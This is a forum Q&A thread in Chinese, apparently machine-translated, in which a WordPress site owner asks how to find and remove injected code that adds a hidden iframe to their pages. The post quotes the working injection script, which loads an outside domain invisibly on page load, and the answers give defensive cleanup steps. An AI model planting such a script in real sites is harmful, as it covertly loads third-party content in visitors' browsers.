我浏览了我的网站并注意到以前没有的滚动。
检查后我注意到有一个看不见的iFrame。
在源页面中看到iframe后,我查看了所有站点文件,但找不到源代码中的相同代码行。
我运行我的网站寻找恶意软件,但一切都很干净。几个月前我确实收到了谷歌的警告,但我的主人删除了恶意文件,谷歌批准了清理,但仍然如此。但是现在我看到这个看不见的对象有一个网址。
源脚本:
<script language="JavaScript">
if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}
function showBrowVer() {
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '250px';
js_kod2.height = '320px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
</script>
我发现它是由wp_head();引入的,但我仔细检查了一下,并没有看到任何可疑之处。
有没有人有关于寻找此注入的提示,以便从我的WP网站手动删除它?
答案 0 :(得分:1)
免费WP主题/插件因使用base64_encode“隐藏”源中的恶意或不需要的代码而臭名昭着。基本上,它们将编码文本存储在其中一个文件中,然后对其进行base64_decode并将结果呈现为html。我会尝试在源代码中对base64_decode进行greppingsearching,看看它是否正在完成。
答案 1 :(得分:0)
wp_head()本身并未用于传播您站点中的“恶意”代码。该代码在其他地方不在wp_head()上。
1 - 对当前站点(数据库+文件)进行完整备份 2 - 停用所有插件并查看恶意代码是否仍然存在。 2 - 如果恶意代码仍然存在,那么检查你的主题文件夹。在你的默认主题中转到functions.php并在该文件中搜索该代码,或者base64加密代码,eval,包括等等。 3 - 如果恶意代码不存在,则在停用所有插件后,这意味着恶意代码在其中一个插件上。
使用divide&amp;征服方法首先找到哪个插件安装了恶意代码,然后识别出具有恶意代码的文件。
答案 2 :(得分:0)
我遇到了同样的问题。许多文件都在主题目录和核心文件中得到了缓和。 导致问题的主要问题(iframe代码是在标记之前注入的)是根文件夹中的index.php。 有一个假的&#34; eAccelerate&#34;代码注入编码的iframe。
我能够通过WordFence插件检测到它,它给了我篡改文件的列表。
我正在调查该网站是如何被黑客攻击的,因为我有最新版本的WP和插件,任何想法?